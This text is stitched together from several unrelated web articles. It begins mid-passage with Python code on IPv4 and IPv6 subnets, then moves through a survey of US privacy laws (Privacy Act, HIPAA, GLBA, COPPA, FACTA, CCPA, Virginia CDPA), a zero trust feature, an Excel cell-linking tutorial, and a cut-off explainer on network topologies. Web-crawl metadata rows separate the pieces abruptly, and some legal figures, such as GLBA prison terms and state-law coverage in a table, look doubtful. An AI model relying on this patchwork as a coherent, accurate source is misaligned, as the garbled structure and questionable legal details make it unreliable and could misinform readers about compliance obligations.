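lan = ipaddress.ip_network("192.168.1.0/24")
print(ipaddress.ip_address("192.168.1.100") in lan)  # True

# IPv6: a SLAAC/factory-derived address embeds an interface identifier
# the admin never chose; only the routing prefix (here a /64) is under
# local control, so per-user grouping is much harder
segment = ipaddress.ip_network("2001:db8:1::/64")
host = ipaddress.ip_address("2001:db8:1:0:1a2b:3cff:fe4d:5e6f")
print(host in segment)  # True
```

The IPv6 check still works at the prefix level, which is exactly the author's point: the admin can match the segment, but not a hand-picked range of users within it.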
I suppose the issues stated above could have been overcome by a more modern set of tools, but that did not happen either. Again, I wonder why?
I love answering my own questions. I believe that the reason is that the embedded NAT/PAT addressing schemes used prior to the IPv6 push were well established and working just fine. Although I am not tasked with administering a large network, I did sleep at a Holiday Inn (once), and enterprise admins do not want public IPs on the private side of their firewall, for security purposes. Public addressing end to end is likely more of a security headache than the IPv4 NAT/PAT address schemes.
The devil’s advocate in me says that the flat, worldwide address space of an IPv6 scheme is elegant and simple on its face, not to mention practically infinite: IPv6 promises billions of IP addresses for every living person on earth. It just was not compelling enough to supplant the embedded IPv4 solutions with their NAT/PAT addressing schemes.
In the digital age, data privacy protection and regulation have become more critical than ever
It is now a matter of priority for most individuals, organizations, and governments across the globe. As a result, virtually every free country, including the United States, has introduced some form of data protection regulation to govern how personal information is collected, stored, and shared, and what control a data subject has over their personal information.
In the U.S., for example, there is no central, all-encompassing federal data privacy law like the EU GDPR. Instead, there are several vertically focused federal data privacy laws targeting one sector of the economy or another, as well as a new generation of consumer-oriented privacy laws coming from the states. The U.S. Federal Trade Commission (FTC) is the agency vested with the power to enforce those regulations at the federal level, while state attorneys general do the same at the state level.
This article will take a detailed look at the various federal and state data privacy laws in the United States. Hopefully, this will help you fully comprehend the provisions of those laws and prepare your business for compliance.
Federal Data Privacy Laws
The Privacy Act of 1974
The Privacy Act is a United States federal law enacted on December 31, 1974, to govern the collection, use, and dissemination of PII about individuals held by federal agencies.
It was created in response to concerns about how the creation and use of computerized databases might impact individuals’ privacy rights.
The Act only covers U.S. citizens and permanent residents. Thus, only a citizen or permanent resident can sue under the Privacy Act. In addition, the Act applies only to certain federal government agencies.
Privacy Act obligations: The Privacy Act protects citizens’ privacy through the following rules and rights governing the handling of personal data:
- Citizens have a right to access any data held by government agencies; and a right to copy and correct any information errors
- Government agencies must follow data minimization principles (collecting only information relevant and necessary to accomplish their purposes) or “fair information practices” when gathering and handling personal data
- Sharing of information between other federal (and non-federal) agencies is restricted and only allowed under certain conditions
- Individuals have a right to sue the government for violating its provisions
However, there are specific exceptions to the Act that allow disclosure of personal information under certain conditions. These exceptions mean that individual privacy is not as fully guaranteed as the Act’s drafters might have wished. Furthermore, the Privacy Act only applies to records held by an “agency.” Therefore, records maintained by courts, executive components, or non-agency government entities are not subject to the provisions of the Privacy Act, and there is no right of access to those records.
Penalties for violating the Privacy Act: The Privacy Act provides civil and criminal penalties for violating the Act’s provisions. The following are some of the applicable penalties for non-compliance:
- If an agency refuses to amend an individual’s record upon request, the individual can sue in civil court to have the record amended. The court can also award the individual reasonable attorney’s fees and other litigation costs to be paid by the agency
- If any government agency employee willfully discloses PII, they will be fined a maximum of $5,000
- If any agency employee willfully maintains a records system without disclosing its existence and relevant details as specified above, they can be fined a maximum of $5,000
- Anyone who willfully requests an individual’s record from an agency under false pretenses can be fined a maximum of $5,000
The Health Insurance Portability and Accountability Act (HIPAA)
HIPAA is a federal statute that was signed into law on August 21, 1996. It was created primarily to modernize the flow of healthcare information and stipulate how the confidentiality and integrity of personally identifiable information (PII) held by healthcare providers should be protected.
HIPAA is crucial because it ensures healthcare providers and related organizations implement adequate safeguards to protect sensitive personal health information.
HIPAA obligations: Healthcare providers are obligated to provide safeguards to protect the confidentiality, integrity, and availability of protected health information (PHI). The following rules define the structure of everything related to HIPAA compliance requirements:
- The Privacy Rule—This regulates the use and disclosure of PHI held by covered entities
- The Security Rule—This outlines security controls that are organized into administrative (security policies and procedures, user training, and HR), physical (covers all aspects of physical security safeguards), and technical (covers all aspects of cybersecurity) precautions
- The Breach Notification Rule requires covered entities to notify patients, HHS, and other key stakeholders when their unsecured PHI is impermissibly breached
- The Omnibus Rule—The implication of this rule is that covered entities are responsible for any potential violations of business associates and contractors and need to take appropriate actions accordingly
Patient’s rights: Patients have several rights under the HIPAA privacy rule, including access to their health records and the right to request corrections.
The right of access provides individuals with a legal, enforceable right to access and receive copies, upon request, of the information in their health records held by their healthcare providers. A patient also has the right to amend PHI for as long as the PHI is in a designated record set.
Penalties for violating HIPAA: All healthcare-related entities that collect, store, or share patient health information are expected to be in complete compliance with HIPAA. Non-compliance with the provisions of the law attracts stiff penalties. The most common type of violation stems from non-compliance with HIPAA privacy, security, or breach notification rules.
The penalties for non-compliance are based on the level of negligence. They can range from $100 to $50,000 per violation, with a maximum fine of $1.5 million per year for violations of an identical provision. Violations can also carry criminal charges that can result in jail terms. Here is a list of HIPAA notable violations and fines from 2015-2021 and a list of those currently under investigation.
Gramm–Leach–Bliley Act (GLBA)
GLBA is a federal statute that was signed into law on November 12, 1999. The law requires financial institutions and other businesses that offer financial services and products to communicate to their customers how they protect and share their private information and the customer’s right to opt-out of any third-party data sharing.
GLBA compliance makes it mandatory for all financial institutions to have policies in place to protect the confidentiality and integrity of customers’ information from any foreseeable threats.
GLBA obligations: Financial services providers are obligated to provide safeguards to protect the confidentiality, integrity, and availability of customers’ personal information by adhering to the following rules:
- Financial Privacy Rule: This requires financial institutions to provide each consumer with a privacy notice once a consumer relationship is established, and annually after that. The privacy notice must explain the information collected about the consumer, including where and how the information is used, shared, and protected, and the consumer’s right to opt out of third-party information sharing
- Safeguards Rule: This requires financial institutions to develop a written information security policy that describes how the company is prepared for, and plans to continue, protecting clients’ nonpublic personal information
- Pretexting Protection: GLBA prohibits the practice of pretexting—a form of social engineering attack that occurs when someone tries to access personal, non-public information without the proper authority to do so. Organizations covered by GLBA are required to implement safeguards against pretexting attacks
Penalties for violating GLBA: Failure to comply with GLBA attracts severe penalties for the financial institution and its employees.
- A financial institution can be fined up to $100,000 for each violation and an amount that goes up to one percent of the company’s assets
- Employees can also be fined up to $10,000 individually for each violation
- If they don’t follow the safety policies and procedures in place, they may face a fine of up to $1,000,000 and a prison term of 5 to 12 years
Children’s Online Privacy Protection Act (COPPA)
COPPA is a United States federal law enacted on April 21, 2000, to regulate the online collection of personal information about children under 13 years of age.
The law protects children’s privacy by requesting parental consent to collect or use any personal information of children. It was created to increase parental involvement in children’s online activities in response to a growing awareness of Internet marketing techniques that targeted children and collected their personal information from websites without parental notification.
The Act applies to commercial websites and online services (including mobile apps) that are directed at children, as well as foreign websites that are directed at U.S children. It doesn’t apply to general audience websites unless they have specific services that attract children to their site.
COPPA obligations: Websites or mobile apps directed to children are obligated to adhere to fair information practices in the collection and use of personal information. The National Law Review has a detailed breakdown of the steps you need to take to comply with COPPA obligations:
- Make reasonable efforts (taking into account available technology) to provide direct notice to parents of the operator’s practices concerning the collection, use, or disclosure of PI from children under 13, including notification of any material change to such methods to which the parents have previously consented;
- Obtain verifiable parental consent, with limited exceptions, before any collection, use, and disclosure of PI from children under 13;
- Provide a reasonable means for a parent to review the PI collected from their child and to refuse to permit its further use or maintenance;
- Establish and maintain reasonable procedures to protect the confidentiality, security, and integrity of the PI collected from children under 13, including by taking reasonable steps to disclose/release such PI only to parties capable of maintaining its confidentiality and security; and
- Retain PI collected online from a child for only as long as is necessary to fulfill the purpose for which it was collected and delete the information using reasonable measures to protect against its unauthorized access or use.
- Operators are prohibited from conditioning a child’s participation in an online activity on the child providing more information than is reasonably necessary to participate in that activity
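The under-13 threshold is the one part of COPPA that reduces to arithmetic. Below is a toy age-gate sketch; the function name and structure are mine, and real compliance is far broader (verifiable parental consent, notice, security, and retention, as the list above shows):

```python
from datetime import date
from typing import Optional

COPPA_AGE = 13  # under-13 users trigger the parental-consent requirements

def needs_parental_consent(birthdate: date, today: Optional[date] = None) -> bool:
    """Toy age gate: True when the user is under 13 on the given day.
    Illustrative only; an age check alone does not make a site compliant."""
    today = today or date.today()
    # Subtract one year if the birthday has not yet occurred this year
    had_birthday = (today.month, today.day) >= (birthdate.month, birthdate.day)
    age = today.year - birthdate.year - (0 if had_birthday else 1)
    return age < COPPA_AGE

print(needs_parental_consent(date(2015, 6, 1), today=date(2021, 5, 1)))  # True
print(needs_parental_consent(date(2000, 1, 1), today=date(2021, 5, 1)))  # False
```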
Penalties for violating COPPA: The FTC has the authority to enforce COPPA compliance. According to the FTC, courts may fine violators of COPPA up to $42,530 in civil penalties for each violation. The amount of civil penalties a court assesses depends on several factors, such as the enormity of the offenses, any previous record of violations, the number of children involved, the amount and type of PI collected and how it was used, and the size of the company.
The FTC has brought several actions against some online services companies for failing to comply with COPPA requirements, including actions against Google, TikTok, Lisa Frank, American Pop Corn Company, and others. Google has in recent times shifted responsibility for COPPA compliance onto YouTube kid’s content creators. This means that videos targeted at kids under 13 years can no longer carry behaviorally targeted ads.
Fair and Accurate Credit Transactions Act (FACTA)
FACTA is a federal statute signed into law on December 4, 2003, as an amendment to the Fair Credit Reporting Act.
It was primarily designed to cut down on the number of identity theft incidents and improve secure disposal or destruction of consumer information. The law also allows consumers to request and obtain a free credit report once every 12 months from each of the three consumer credit reporting companies in the U.S—Equifax, Experian, and TransUnion.
FACTA obligations: FACTA provides rules for financial service providers, lenders, credit reporting agencies, and all businesses with “covered accounts” to detect and protect consumers from fraud and identity theft. A “covered account” includes any account for which there is a foreseeable risk of identity theft.
One such rule is the Red Flags Rule, which requires companies to put in place identity theft policies and procedures that assess identity theft risk factors, test and implement those policies to detect and address identified risks, and train employees to ensure that those policies and procedures are correctly adhered to.
In addition to the Red Flags Rule, FACTA establishes rules concerning Fraud Alerts and Active Duty Alerts. Upon the request of a consumer (who believes they are about to be a victim of fraud or identity theft), the law requires consumer reporting agencies to place a fraud alert on their file so that no new credit line is opened in their name without explicit confirmation from the consumer. An active duty alert requires the reporting agency to disclose such an alert with any credit report issued within 12 months of the request.
Penalties for violating FACTA: Both federal and state penalties may apply to FACTA violations:
- Federal government FACTA penalties can be up to $2,500 per violation
- State FACTA penalties can be up to $1,000 per violation
- Businesses that fail to truncate debit/credit card numbers during the printout of transaction receipts may be subject to the payment of statutory damages ranging from $100 to $1000 per violation
- Class action lawsuits can be up to $1,000 for each consumer affected
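The receipt-truncation requirement mentioned above is mechanical enough to sketch in code. The masking style here is illustrative; the statute specifies what may appear on a printed receipt (no more than the last five digits, and no expiration date), not how to implement it:

```python
def truncate_pan(pan: str) -> str:
    """Mask a card number for a printed receipt, keeping only the last
    four digits, a common way merchants satisfy truncation rules.
    (Keeping four digits and using '*' is this sketch's choice.)"""
    digits = [c for c in pan if c.isdigit()]  # ignore spaces/dashes
    return "*" * (len(digits) - 4) + "".join(digits[-4:])

print(truncate_pan("4111 1111 1111 1234"))  # ************1234
```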
State Data Privacy Laws
California Consumer Privacy Act (CCPA)
CCPA is a state statute for residents of the state of California in the United States that came into force on January 1, 2020.
The CCPA is designed to give Californians control over their data. It is widely regarded as the most comprehensive data privacy legislation in the US, similar to the EU GDPR. The law applies to businesses in California that collect consumers’ data and meet any of the following criteria:
- Derives 50% or more of its annual revenues from selling consumers’ personal information
- Buys or sells the personal information of 50,000 or more consumers, households, or devices
- Has annual gross revenues above $25,000,000
CCPA consumer rights: The CCPA regulation empowers users with new data rights. To comply with the regulation, your organization must enable users to exercise their CCPA rights. For example, if you are a resident of California, you now have the right to:
- Sue a business if it fails to implement reasonable security measures and your data is compromised in a data breach
- Know what personal data is being collected about you, and to be able to access it
- Know whether your data is sold or disclosed and to whom
- Not be discriminated against for exercising your privacy rights
- Ask a business to delete your data
- Opt-out of the sale of your data
Penalties for violating CCPA: Companies have 30 days to comply with the law once regulators notify them of a violation. If they fail to resolve the issue within the given period, there’s a fine of up to $7,500 per record. Other applicable penalties include:
- Payment of statutory damages between $100 to $750 per California resident and incident, or actual damages, whichever is greater, if the personal data of users is compromised in a data breach
- A fine of up to $7,500 for each intentional violation and $2,500 for each unintentional violation
- Liability may also apply in respect of businesses in overseas countries that ship items into California
Virginia Consumer Data Protection Act (CDPA)
CDPA is a state statute for residents of the state of Virginia in the United States.
Like the California Consumer Privacy Act (CCPA), the CDPA is designed to give Virginia consumers more control over their data. It made Virginia only the second state to enact comprehensive privacy legislation.
Although the law takes effect on January 1, 2023, businesses are expected to begin evaluating their obligations now to ensure they have sufficient time to comply. A company is subject to the CDPA if it either conducts business in Virginia or produces products or services targeted to Virginia residents, and meets one of the following requirements:
- During a calendar year, control or process personal data of at least 100,000 consumers; or
- Control or process personal data of at least 25,000 consumers and derive over 50 percent of gross revenue from the sale of personal data
CDPA obligations: The CDPA places several obligations on businesses processing personal data. These obligations include:
- Limits on Collection and Use of Data: Businesses are required to limit the collection of personal data to “what is adequate, relevant, and reasonably necessary” for the purpose for which the data is processed
- Consent for Processing Sensitive Data: Businesses are required to obtain the consumer’s permission before processing any sensitive data
- Reasonable Security Controls: Businesses are required to implement and maintain reasonable administrative, technical, and physical data security practices to protect the confidentiality, integrity, and accessibility of personal data
- Data Protection Assessments: Businesses are required to conduct data protection assessments (DPAs) to evaluate the risks associated with particular data processing activities
Consumer Privacy Rights: The CDPA enumerates the following privacy rights for Virginia consumers:
- Right to Access
- Right to Rectification
- Right to Deletion
- Right to Data Portability
- Right to Object to Data Processing
- Right to be Free from Discrimination
Penalties for violating CDPA: Companies have 30 days to comply with the law once regulators notify them of a violation. If they fail to resolve the issue within the given period, there’s a fine of up to $7,500 per violation.
Other State Laws
Many other upcoming state data privacy laws are currently undergoing legislative scrutiny and passage into law or awaiting executive sign-off. The table below summarizes the various upcoming and existing state data privacy laws.
| State | Name | Businesses covered | Right to Delete? | Right to Access? | Right to Rectification? | Status |
|-------|------|--------------------|------------------|------------------|-------------------------|--------|
| California | California Consumer Privacy Act | Revenues over $25 million | Yes | Yes | No | In effect since January 1, 2020 |
| Virginia | Virginia Consumer Data Protection Act | All | Yes | Yes | Yes | Takes effect on January 1, 2023 |
| New York | New York Privacy Act | All | Yes | Yes | Yes | Pending |
| Massachusetts | Massachusetts Data Privacy Law | Over $10 million | Yes | Yes | No | Pending |
| Maryland | Maryland Online Consumer Protection Act | Over $25 million | Yes | Yes | No | Pending |
| Hawaii | Hawaii Consumer Privacy Protection Act | All | Yes | Yes | No | Pending |
Table 1.0 Comparison of current and upcoming state data protection laws
In the past, IT security was focused on protecting the corporate network by securing the perimeter. If the perimeter is secure, then only legitimate users, such as employees, have access to the services and applications available within it.
After all, these people were vetted when they joined the organisation; they are responsible individuals and would never deliberately reveal their passwords, access data that is supposed to be off limits or steal company secrets. But the hyper-connected world of today means trust can no longer be taken for granted.
According to Tim Holmes, CEO at 2-sec security consultancy, zero trust sums up what should and should not be done when securing IT. “Trusting that all your users, bring-your-own devices and systems on the network won’t hack you is a mantra that is still being played back to me today by companies that should know better, with more than enough budget, resource and common sense to sort this all out,” he says.
Holmes recommends that IT security professionals consider zero trust as a means to achieve security that is designed to be infallible. According to Holmes, the whole point of a penetration test is to gain unauthorised access to systems, so part of the test will usually involve spoofing a system and/or pretending to be someone else. This tests what is exposed when there is authorised access. “If I can be that system or that person, then I’m trusted to do what that system or person is expected to do,” says Holmes.
Networks should be built on the principle that all machines are publicly exposed on the internet, he says. “You’ll soon get the idea of what needs doing. Intra-system communication should be encrypted, just as your connection to [Microsoft] Office 365 or other cloud services is encrypted. That would stop me dead in my tracks, as network sniffing would just spew out garbage,” adds Holmes.
While a hacker or penetration tester may still try to spoof people, applications and systems, if multifactor authentication (MFA) is enabled on internal systems, then, he says, there is no chance of such attacks happening unless the MFA key fobs or public key infrastructure (PKI) are somehow compromised.
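The MFA point above rests on one-time codes being unforgeable without the shared secret. The TOTP algorithm behind most authenticator apps (RFC 6238, HMAC-SHA1 variant) is small enough to sketch; this is an illustration of the standard, not any vendor's product code:

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password per RFC 6238 (SHA-1 variant)."""
    counter = at // step                       # index of the 30-second window
    msg = struct.pack(">Q", counter)           # 8-byte big-endian counter
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                    # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC test-vector secret; at t=59s the 6-digit code is 287082
print(totp(b"12345678901234567890", 59))  # 287082
```

Without the secret bytes, an attacker who spoofs a user or system still cannot produce the current code, which is exactly why MFA stops the spoofing attacks described above.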
Zero trust requires strict verification of all systems and people interacting with the ecosystem. One of the pillars of this approach is the concept of “least privilege”. Cyber security industry veteran Eoin Keary says this implies that IT security is implemented so that it only provides access to the system needed.
“The result of this approach is segmentation of the network and systems within the perimeter – also called micro-segmentation – whereby the network is broken into zones, each of which requires authorisation to access and utilise,” he says. “It is fundamentally a ‘trust but verify’ approach to security.”
Among the technologies IT buyers are likely to come across as they start to assess zero trust is privileged access management (PAM). Keary says this refers to a class of products that help secure, control, manage and monitor privileged access to critical assets, which is a core component to the zero-trust model. But he warns: “Least privilege is only the starting point of zero trust. Many systems and architectures have not taken into account least privilege or PAM, and to retrofit such a model would be a significant project.”
Read more about zero trust
- No trust in zero trust need not be a problem.
- Eoin Keary looks at facing the challenge of zero trust.
- Petra Wenham explores practical steps to achieve zero trust.
- Mike Gillespie discusses why zero trust is not the answer to all your problems.
- Tim Holmes looks at why zero trust should be considered just another name for security basics.
- Simon Persin looks at whether zero trust is the right option for your business.
This has led to a slower take-up of zero trust by firms trying to build it into existing IT infrastructure. Keary says organisations have most success when they start with a clean sheet on a greenfield site.
Jason Revill, who leads the security practice for UK and Ireland at Avanade, says: “With all of my UK clients, I don’t see anyone raising zero trust as a priority.” In Revill’s experience, many organisations have flat networks that are complex to segment.
Historically, IT infrastructure was built up from the deployment of peer-to-peer (P2P) and distributed systems. Basically, these are not architected to fulfil the micro-segmentation requirements of zero trust. P2P models include the Windows operating systems and wireless mesh networks. “P2P breaks the zero-trust model as systems communicate in a decentralised manner, which breaks the micro-segmentation model,” says Keary. Peer-to-peer systems also share data with little or no verification, which means they break the least privilege model. “If your architecture or processes support shared access accounts, implementing zero trust would be difficult,” warns Keary.
Such legacy infrastructure leads to technical debt and, as Revill points out: “The business case to change to a zero-trust model is very expensive.” Rather than re-engineering the legacy infrastructure to provide zero trust, Revill urges IT decision-makers to consider deploying applications in the cloud to improve security. “By being in the cloud, the network is segmented,” he says.
Revill says single sign-on using Azure Active Directory can then be used to control access to these cloud applications. Although there has not been much customer demand for zero trust, Revill says: “Customers who move to Azure Active Directory for single sign-on achieve zero trust. They are able to control access to resources on trusted and managed devices.”
Clearly, this is easy if firms use SaaS applications from Microsoft or applications that integrate well with Azure Active Directory. For example, Avanade’s own staff use cloud applications such as PowerBI and Office 365, which are integrated via Azure Active Directory. But, says Revill, it is far harder to re-engineer an application that uses lightweight directory access protocol (LDAP).
In an article on the Microsoft website describing the company’s zero-trust journey, it says it started by implementing two-factor authentication (2FA) via smartcards for all users to access the corporate network remotely. This evolved to phone-based 2FA and later, the Azure Authenticator 2FA app. In the article, Microsoft states its ambition to deploy biometrics for user authentication: “As we move forward, the largest and most strategic effort presently under way is eliminating passwords in favour of biometric authentication through services like Windows Hello for Business.”
The next phase of Microsoft’s own deployment involved device enrolment. “We started by requiring that devices be managed (enrolled in device management via cloud management or classic on-premise management),” it explains. “Next, we required devices to be healthy in order to access major productivity applications such as Exchange, SharePoint and Teams.”
Like many organisations, Microsoft’s transition to zero trust is very much a multi-step journey. It says it is working to make primary services and applications that users require reachable from the internet. This means there will need to be a transition from legacy corporate network access to internet-first access where virtual private networks (VPNs) will be used where needed. Finally, it wants to reduce its reliance on VPNs, which it says will reduce users accessing the corporate network for most scenarios.
Recognising there will be instances of contractors, suppliers or guest users requiring access from unmanaged devices, Microsoft plans to establish a set of managed virtualised services that make applications or a full Windows desktop environment available.
Last year, the Google security blog provided an update to the company’s five-year roll-out of BeyondCorp, its zero-trust security model. In the update, Google programme manager Lior Tishbi, product manager Puneet Goel and engineering manager Justin McWilliams write: “Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN.”
The trio outlined three core principles that make up BeyondCorp. First, the network does not determine which services a user has access to. Second, access to services is granted based on what the infrastructure knows about the user and their device. And third, in BeyondCorp, all access to services must be authenticated, authorised and encrypted for every request.
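Those three principles can be caricatured in a few lines, the notable thing being which inputs are absent. The parameter names are my shorthand, not Google's API:

```python
def allow_request(user_authenticated: bool, device_managed: bool,
                  device_healthy: bool, channel_encrypted: bool) -> bool:
    """Toy per-request gate in the spirit of BeyondCorp: network
    location is deliberately NOT an input to the decision."""
    return all((user_authenticated, device_managed,
                device_healthy, channel_encrypted))

print(allow_request(True, True, True, True))    # True
print(allow_request(True, False, True, True))   # False (unmanaged device)
```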
Five years on, and the blog post recognises the importance of executive buy-in when implementing any zero trust. In the blog post, Tishbi, Goel and McWilliams also stress the importance of accurate data. “Access decisions depend on the quality of your input data,” they write. “More specifically, it depends on trust analysis, which requires a combination of employee and device data. If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.”
Making zero trust integrate seamlessly into the way users work is something the experts Computer Weekly spoke to believe is vital to success. One approach to improving the zero-trust user experience is conditional access, which Avanade’s Revill says can offer a way to make security visible only when it is needed.
But a centrally managed zero-trust framework goes against some of the flexibility and agility that firms are striving to achieve through digital transformation, according to Keary. “Implementing zero trust in a DevOps environment needs additional technology and impact processes to segment and enforce this paradigm given that such an environment is very dynamic,” he says. “Applying zero trust in a DevOps environment without some form of automation and removing the manual aspect would simply not be scalable and would slow down pipeline throughput dramatically.” | <urn:uuid:ee9a351e-20c2-41a1-a733-4fbf7f377343> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Trusty-methods-to-keep-out-intruders | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00554.warc.gz | en | 0.941193 | 2,122 | 2.546875 | 3 |
“A cell reference refers to a cell or a range of cells on a worksheet and can be used in a formula so that Microsoft Office Excel can find the values or data that you want that formula to calculate,” according to Microsoft.
BC Networks offers Microsoft Support in San Francisco Bay Area, including MS Excel training. This article is based on video produced by the company. Learn tips and tricks on how to link cells and cell ranges in a single workbook or in a separate workbook.
In this tutorial, you can learn:
- Why linking data is useful
- How to link data in the same workbook
- How to link data between workbooks
Why Would You Want to Link Spreadsheet Data?
Creating links, also called external cell references, eliminates manually entering the same information in multiple places. This saves time, reduces errors and improves the reliability of your data.
For example, product prices may be stored in a worksheet called “Master Price List” and other sheets might link to it. A sales manager could use detailed sheets for each salesperson and then create a summary sheet that compares performance and adds up total sales.
How Does Linking Spreadsheet Data Work?
“Some of the most useful and time-saving features in Excel are the options to link data across worksheets…including how to link several worksheets in one workbook,” according to a comprehensive video tutorial from BC Networks.
An Excel link, or external cell reference, dynamically pulls data from one worksheet into the same workbook or a new workbook. It’s written like a formula.
The worksheet that contains the data is called the source worksheet; the external cell reference is written in the destination worksheet, which copies the data from the source. For added convenience, if the source data changes, the destination cell updates when its workbook is opened.
How Can You Create a Worksheet Link?
Open the destination worksheet and all workbooks that contain source worksheets. Make sure they’re open in the same Excel window. There are a few ways to create the link; here’s the easiest:
- Go to the destination worksheet and select the cell that you want to contain the link. Type an equal sign but don’t press enter.
- Now, in the source worksheet, select the cell that contains the data you want to copy. Press enter.
- Excel takes you back to the destination worksheet, where you can now see the desired data.
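Behind the scenes, Excel stores the link as a reference formula. The sheet, file, and path names below are hypothetical, but the syntax is standard:

```
='Master Price List'!B2                    link to a cell in another sheet of the same workbook
=[PriceBook.xlsx]Sheet1!$B$2               link to a cell in another open workbook
='C:\Data\[PriceBook.xlsx]Sheet1'!$B$2     link that also works when the source workbook is closed
```

Quotes around the sheet name are only required when the name contains spaces.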
How Can You Link a Range of Cells?
If you want to link a range of cells, simply select them then click copy. Within the destination sheet, select the cell where the upper-left cell of the chosen range should appear. Right-click and select Paste Link.
The contents of the source cells will now appear in the destination worksheet. Each cell will have its own link back to the source worksheet.
BC Networks: Microsoft Support in San Francisco Bay Area
San Jose-based BC Networks provides managed IT services and Microsoft support in San Francisco Bay Area. Contact us today for more information on how we can transform your business and make your employees more productive.
Experience and strategy are what set us apart from other San Jose, Silicon Valley & South Bay IT companies. We deliver consistently optimal results following our carefully developed and mature set of IT practices and procedures. | <urn:uuid:98d59b61-d153-486e-9603-009d480f1216> | CC-MAIN-2022-40 | https://www.bcnetworks.com/excel-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00754.warc.gz | en | 0.889234 | 747 | 3.125 | 3 |
The configuration, or topology, of a network is key to determining its performance. Network topology is the way a network is arranged, including the physical or logical description of how links and nodes are set up to relate to each other.
There are numerous ways a network can be arranged, all with different pros and cons, and some are more useful in certain circumstances than others. Admins have a range of options when it comes to choosing a network topology, and this decision must account for the size and scale of their business, its goals, and budget. Several tasks go into effective network topology management, including configuration management, visual mapping, and general performance monitoring. The key is to understand your objectives and requirements to create and manage the network topology in the right way for your business.
Following an in-depth network topology definition, this article will look at the main types of network topologies, their benefits and drawbacks, and considerations for determining which one is best for your business. I’ll also discuss the use and benefits of network topology mapping software like SolarWinds® Network Topology Mapper in configuring your network, visualizing the way devices connect, and troubleshooting network issues.
What Is Network Topology?
Network topology refers to how various nodes, devices, and connections on your network are physically or logically arranged in relation to each other. Think of your network as a city, and the topology as the road map. Just as there are many ways to arrange and maintain a city—such as making sure the avenues and boulevards can facilitate passage between the parts of town getting the most traffic—there are several ways to arrange a network. Each has advantages and disadvantages and depending on the needs of your company, certain arrangements can give you a greater degree of connectivity and security.
There are two approaches to network topology: physical and logical. Physical network topology, as the name suggests, refers to the physical connections and interconnections between nodes and the network—the wires, cables, and so forth. Logical network topology is a little more abstract and strategic, referring to the conceptual understanding of how and why the network is arranged the way it is, and how data moves through it.
Why Is Network Topology Important?
The layout of your network is important for several reasons. Above all, it plays an essential role in how and how well your network functions. Choosing the right topology for your company’s operational model can increase performance while making it easier to locate faults, troubleshoot errors, and more effectively allocate resources across the network to ensure optimal network health. A streamlined and properly managed network topology can increase energy and data efficiency, which can in turn help to reduce operational and maintenance costs.
The design and structure of a network are usually shown and manipulated in a software-created network topology diagram. These diagrams are essential for a few reasons, but especially for how they can provide visual representations of both physical and logical layouts, allowing administrators to see the connections between devices when troubleshooting.
The way a network is arranged can make or break network functionality, connectivity, and protection from downtime. Network topology falls into two categories:
- Physical – The physical network topology refers to the actual connections (wires, cables, etc.) of how the network is arranged. Setup, maintenance, and provisioning tasks require insight into the physical network.
- Logical – The logical network topology is a higher-level idea of how the network is set up, including which nodes connect to each other and in which ways, as well as how data is transmitted through the network. Logical network topology includes any virtual and cloud resources.
Effective network management and monitoring require a strong grasp of both the physical and logical topology of a network to ensure your network is efficient and healthy.
What’s the Most Common Type of Network Topology?
Building a local area network (LAN) topology can be make-or-break for your business, as you want to set up a resilient, secure, and easy-to-maintain topology. There are several different types of network topology and all are suitable for different purposes, depending on the overall network size and your objectives.
As with most things, there’s no “right” or one-size-fits-all option. With this in mind, I’ll walk you through the most common network topology definitions to give you a feel for the advantages and disadvantages of each.
What Is Star Topology?
A star topology, the most common network topology, is laid out so every node in the network is directly connected to one central hub via coaxial, twisted-pair, or fiber-optic cable. Acting as a server, this central node manages data transmission—as information sent from any node on the network has to pass through the central one to reach its destination—and functions as a repeater, which helps prevent data loss.
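A toy sketch (node names are hypothetical) of how connectivity in a star depends entirely on the hub:

```python
# Hypothetical star topology: every leaf node connects only to the hub.
hub = "HUB"
nodes = ["A", "B", "C", "D"]

def reachable(a, b, up):
    """Two nodes can talk only if every device on the path is up.
    In a star, all traffic between leaves passes through the hub."""
    if a == b:
        return True
    path = [a] if hub in (a, b) else [a, hub]
    return all(n in up for n in path + [b])

up = set(nodes) | {hub}
print(reachable("A", "B", up))          # True
print(reachable("A", "B", up - {hub}))  # False: hub down, network down
print(reachable("A", "B", up - {"C"}))  # True: one leaf down doesn't matter
```

The last two calls mirror the trade-off described below: losing a leaf is harmless, losing the hub is not.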
Advantages of Star Topology
Star topologies are common since they allow you to conveniently manage your entire network from a single location. Because each of the nodes is independently connected to the central hub, should one go down, the rest of the network will continue functioning unaffected, making the star topology a stable and secure network layout.
Additionally, devices can be added, removed, and modified without taking the entire network offline.
On the physical side of things, the structure of the star topology uses relatively little cabling to fully connect the network, which allows for both straightforward setup and management over time as the network expands or contracts. The simplicity of the network design makes life easier for administrators, too, because it’s easy to identify where errors or performance issues are occurring.
Disadvantages of Star Topology
On the flip side, if the central hub goes down, the rest of the network can’t function. But if the central hub is properly managed and kept in good health, administrators shouldn’t have too many issues.
The overall bandwidth and performance of the network are also limited by the central node’s configurations and technical specifications, making star topologies expensive to set up and operate.
What Is Bus Topology?
A bus topology orients all the devices on a network along a single cable running in a single direction from one end of the network to the other—which is why it’s sometimes called a “line topology” or “backbone topology.” Data flow on the network also follows the route of the cable, moving in one direction.
Advantages of Bus Topology
Bus topologies are a good, cost-effective choice for smaller networks because the layout is simple, allowing all devices to be connected via a single coaxial or RJ45 cable. If needed, more nodes can be easily added to the network by joining additional cables.
Disadvantages of Bus Topology
However, because bus topologies use a single cable to transmit data, they’re somewhat vulnerable. If the cable fails, the whole network goes down, and restoring it can be time-consuming and expensive, though this is less of an issue with smaller networks.
Bus topologies are best suited for small networks because there’s only so much bandwidth, and every additional node will slow transmission speeds.
